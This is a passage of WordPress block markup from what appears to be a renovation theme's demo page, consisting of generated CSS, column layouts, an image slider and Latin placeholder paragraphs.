background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-e06103bb-1f76-411d-8965-9c096fc83e39.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-e06103bb-1f76-411d-8965-9c096fc83e39.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-e06103bb-1f76-411d-8965-9c096fc83e39.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-e06103bb-1f76-411d-8965-9c096fc83e39.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-e06103bb-1f76-411d-8965-9c096fc83e39 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-e06103bb-1f76-411d-8965-9c096fc83e39 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-e06103bb-1f76-411d-8965-9c096fc83e39.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-e06103bb-1f76-411d-8965-9c096fc83e39 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-e06103bb-1f76-411d-8965-9c096fc83e39.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-e06103bb-1f76-411d-8965-9c096fc83e39 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-e06103bb-1f76-411d-8965-9c096fc83e39.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"d4c73368-f76c-46f2-a435-4cd9d0a0ba49\"} -->\n<style type=\"text/css\"> .block-d4c73368-f76c-46f2-a435-4cd9d0a0ba49 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-d4c73368-f76c-46f2-a435-4cd9d0a0ba49 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-d4c73368-f76c-46f2-a435-4cd9d0a0ba49 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-d4c73368-f76c-46f2-a435-4cd9d0a0ba49 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-d4c73368-f76c-46f2-a435-4cd9d0a0ba49 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-d4c73368-f76c-46f2-a435-4cd9d0a0ba49 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-d4c73368-f76c-46f2-a435-4cd9d0a0ba49 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-d4c73368-f76c-46f2-a435-4cd9d0a0ba49 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":33,\"rightPadding\":35,\"rightPaddingTablet\":20,\"blockId\":\"877b65c9-a49d-47a5-b6a5-81fb9e4413fc\"} -->\n<style type=\"text/css\"> .block-877b65c9-a49d-47a5-b6a5-81fb9e4413fc .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-877b65c9-a49d-47a5-b6a5-81fb9e4413fc .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-877b65c9-a49d-47a5-b6a5-81fb9e4413fc .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 35px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-877b65c9-a49d-47a5-b6a5-81fb9e4413fc .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 20px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-877b65c9-a49d-47a5-b6a5-81fb9e4413fc .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-877b65c9-a49d-47a5-b6a5-81fb9e4413fc\" style=\"width:33%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:shortcode -->\n[footermenu menu=\"Services\"]\n<!-- /wp:shortcode --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":67,\"topPaddingMobile\":40,\"blockId\":\"40370995-237d-4910-9e7e-bf730523ea0c\"} -->\n<style type=\"text/css\"> .block-40370995-237d-4910-9e7e-bf730523ea0c .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-40370995-237d-4910-9e7e-bf730523ea0c .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-40370995-237d-4910-9e7e-bf730523ea0c .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-40370995-237d-4910-9e7e-bf730523ea0c .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-40370995-237d-4910-9e7e-bf730523ea0c .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-40370995-237d-4910-9e7e-bf730523ea0c\" style=\"width:67%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"0f418c1e-e49c-4890-8c3d-eaf71da4329d\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":10,\"headingTitleFontFamily\":\"Teko\",\"headingTitleFontSize\":52,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.2,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#343434\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\",\"headingAlignmentMobile\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-0f418c1e-e49c-4890-8c3d-eaf71da4329d .responsive-heading-title-text {\n font-size: 52px !important; margin-bottom: 10px !important; }\n\n.skt-blocks-block-advanced-heading.block-0f418c1e-e49c-4890-8c3d-eaf71da4329d .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-0f418c1e-e49c-4890-8c3d-eaf71da4329d .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-0f418c1e-e49c-4890-8c3d-eaf71da4329d .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-0f418c1e-e49c-4890-8c3d-eaf71da4329d .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-0f418c1e-e49c-4890-8c3d-eaf71da4329d .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-0f418c1e-e49c-4890-8c3d-eaf71da4329d .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-0f418c1e-e49c-4890-8c3d-eaf71da4329d .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-0f418c1e-e49c-4890-8c3d-eaf71da4329d .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-0f418c1e-e49c-4890-8c3d-eaf71da4329d .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-0f418c1e-e49c-4890-8c3d-eaf71da4329d .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-0f418c1e-e49c-4890-8c3d-eaf71da4329d .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-0f418c1e-e49c-4890-8c3d-eaf71da4329d {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-0f418c1e-e49c-4890-8c3d-eaf71da4329d {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-0f418c1e-e49c-4890-8c3d-eaf71da4329d {\n text-align: left; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-0f418c1e-e49c-4890-8c3d-eaf71da4329d\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Teko;font-weight:700;line-height:1.2;letter-spacing:1px;color:#343434\">Fusce congue augue sollicitudin dignissim ultricies</h2></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"style\":{\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\",\"fontSize\":\"normal\"} -->\n<p class=\"section-content has-text-color has-normal-font-size\" style=\"color:#494848\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"style\":{\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\",\"fontSize\":\"normal\"} -->\n<p class=\"section-content has-text-color has-normal-font-size\" style=\"color:#494848\">Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra eget vulputate ac, finiee</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">bus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee semper lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero. Morbi rhoncus sem at ligula tempus varius. Cras erat ipsum, accpellentesque egestas a, condimen in ante. Quisque in felis quam. Cras at ultricie mi purus, viverra eget vulputate ac, finiee bus nec velit.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/advance-columns {\"columns\":1,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"3e26ff63-7bd6-4f03-86ff-1350ade80280\"} -->\n<style type=\"text/css\"> .block-3e26ff63-7bd6-4f03-86ff-1350ade80280 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-3e26ff63-7bd6-4f03-86ff-1350ade80280 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-3e26ff63-7bd6-4f03-86ff-1350ade80280 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-3e26ff63-7bd6-4f03-86ff-1350ade80280 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-3e26ff63-7bd6-4f03-86ff-1350ade80280 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-3e26ff63-7bd6-4f03-86ff-1350ade80280 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-3e26ff63-7bd6-4f03-86ff-1350ade80280 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-3e26ff63-7bd6-4f03-86ff-1350ade80280 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-1\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":100,\"topPadding\":30,\"bottomPadding\":30,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"topPaddingMobile\":30,\"bottomPaddingMobile\":30,\"blockId\":\"6a19d713-186a-4910-9f5c-54b320a56735\"} -->\n<style type=\"text/css\"> .block-6a19d713-186a-4910-9f5c-54b320a56735 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-6a19d713-186a-4910-9f5c-54b320a56735 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-6a19d713-186a-4910-9f5c-54b320a56735 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-6a19d713-186a-4910-9f5c-54b320a56735 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-6a19d713-186a-4910-9f5c-54b320a56735 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-6a19d713-186a-4910-9f5c-54b320a56735\" style=\"width:100%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/image-slider {\"gutter\":0,\"gutterMobile\":0,\"lightbox\":true,\"gridSize\":\"xlrg\",\"height\":500,\"autoPlay\":true,\"autoPlaySpeed\":\"3000\",\"borderWidth\":10,\"iconBackgroundRadius\":0,\"iconBackgroundOpacity\":100,\"iconBackgroundColor\":\"#ffffff\",\"borderColor\":\"#0d2e63\",\"iconColor\":\"#012257\",\"borderStyle\":\"solid\",\"counterId\":\"facb2442-756a-47f1-b6b4-83468ea49299\"} -->\n<style type=\"text/css\"> .block-id-facb2442-756a-47f1-b6b4-83468ea49299 .flickity-button .flickity-button-icon {\n fill: #012257; }\n .skt-blocks-gallery.block-id-facb2442-756a-47f1-b6b4-83468ea49299 .flickity-button {\n background-color: rgba(255, 255, 255, 1); border-radius: 0%; }\n .block-id-facb2442-756a-47f1-b6b4-83468ea49299 .skt-blocks-gallery--item figure {\n height: 480px; }\n</style><div class=\"\"><div class=\"block-id-facb2442-756a-47f1-b6b4-83468ea49299 is-cropped skt-blocks-gallery has-no-alignment has-caption-style-dark has-lightbox\"><div class=\"has-carousel has-carousel-xlrg\" style=\"height:500px\" data-flickity=\"{&quot;autoPlay&quot;:3000,&quot;draggable&quot;:true,&quot;pageDots&quot;:false,&quot;prevNextButtons&quot;:true,&quot;wrapAround&quot;:true,&quot;cellAlign&quot;:&quot;center&quot;,&quot;pauseAutoPlayOnHover&quot;:false,&quot;freeScroll&quot;:false,&quot;arrowShape&quot;:{&quot;x0&quot;:10,&quot;x1&quot;:60,&quot;y1&quot;:50,&quot;x2&quot;:65,&quot;y2&quot;:45,&quot;x3&quot;:20},&quot;thumbnails&quot;:false,&quot;responsiveHeight&quot;:false}\"><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider1-1024x597.jpg\" alt=\"\" data-id=\"36\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider1/\" class=\"wp-image-36\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider3-1024x597.jpg\" alt=\"\" data-id=\"35\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider3/\" class=\"wp-image-35\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider2-1024x597.jpg\" alt=\"\" data-id=\"34\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider2/\" class=\"wp-image-34\"/></figure></div></div></div></div>\n<!-- /wp:skt-blocks/image-slider --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:paragraph {\"style\":{\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\",\"fontSize\":\"normal\"} -->\n<p class=\"section-content has-text-color has-normal-font-size\" style=\"color:#494848\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:spacer {\"height\":30} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/advanced-heading {\"block_id\":\"7f542371-d3ae-4e67-8231-fceef37c9b26\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":10,\"headingTitleFontFamily\":\"Teko\",\"headingTitleFontSize\":44,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.2,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#343434\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\",\"headingAlignmentMobile\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7f542371-d3ae-4e67-8231-fceef37c9b26 .responsive-heading-title-text {\n font-size: 44px !important; margin-bottom: 10px !important; }\n\n.skt-blocks-block-advanced-heading.block-7f542371-d3ae-4e67-8231-fceef37c9b26 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-7f542371-d3ae-4e67-8231-fceef37c9b26 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7f542371-d3ae-4e67-8231-fceef37c9b26 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-7f542371-d3ae-4e67-8231-fceef37c9b26 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-7f542371-d3ae-4e67-8231-fceef37c9b26 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7f542371-d3ae-4e67-8231-fceef37c9b26 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-7f542371-d3ae-4e67-8231-fceef37c9b26 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-7f542371-d3ae-4e67-8231-fceef37c9b26 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7f542371-d3ae-4e67-8231-fceef37c9b26 .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7f542371-d3ae-4e67-8231-fceef37c9b26 .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7f542371-d3ae-4e67-8231-fceef37c9b26 .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-7f542371-d3ae-4e67-8231-fceef37c9b26 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-7f542371-d3ae-4e67-8231-fceef37c9b26 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7f542371-d3ae-4e67-8231-fceef37c9b26 {\n text-align: left; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-7f542371-d3ae-4e67-8231-fceef37c9b26\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Teko;font-weight:700;line-height:1.2;letter-spacing:1px;color:#343434\">Where Caring for Our Community matters</h2></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/section {\"blockId\":\"c85a4ad8-96ae-4e4d-b97a-7063fee7cd14\",\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0} -->\n<div class=\"wp-block-skt-blocks-section skt-blocks-block-section-outer-wrap block-c85a4ad8-96ae-4e4d-b97a-7063fee7cd14 background-type-none alignundefined\" style=\"z-index:1;max-width:900px;margin-left:auto;margin-right:auto\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-c85a4ad8-96ae-4e4d-b97a-7063fee7cd14 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-c85a4ad8-96ae-4e4d-b97a-7063fee7cd14 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-c85a4ad8-96ae-4e4d-b97a-7063fee7cd14 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-c85a4ad8-96ae-4e4d-b97a-7063fee7cd14.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0),rgba(255, 255, 255, 0)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-c85a4ad8-96ae-4e4d-b97a-7063fee7cd14.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-c85a4ad8-96ae-4e4d-b97a-7063fee7cd14.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-c85a4ad8-96ae-4e4d-b97a-7063fee7cd14.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-c85a4ad8-96ae-4e4d-b97a-7063fee7cd14.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0); }\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"62839428-790f-482b-8f5a-8c01f4c41210\"} -->\n<style type=\"text/css\"> .block-62839428-790f-482b-8f5a-8c01f4c41210 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-62839428-790f-482b-8f5a-8c01f4c41210 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-62839428-790f-482b-8f5a-8c01f4c41210 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-62839428-790f-482b-8f5a-8c01f4c41210 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-62839428-790f-482b-8f5a-8c01f4c41210 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-62839428-790f-482b-8f5a-8c01f4c41210 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-62839428-790f-482b-8f5a-8c01f4c41210 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-62839428-790f-482b-8f5a-8c01f4c41210 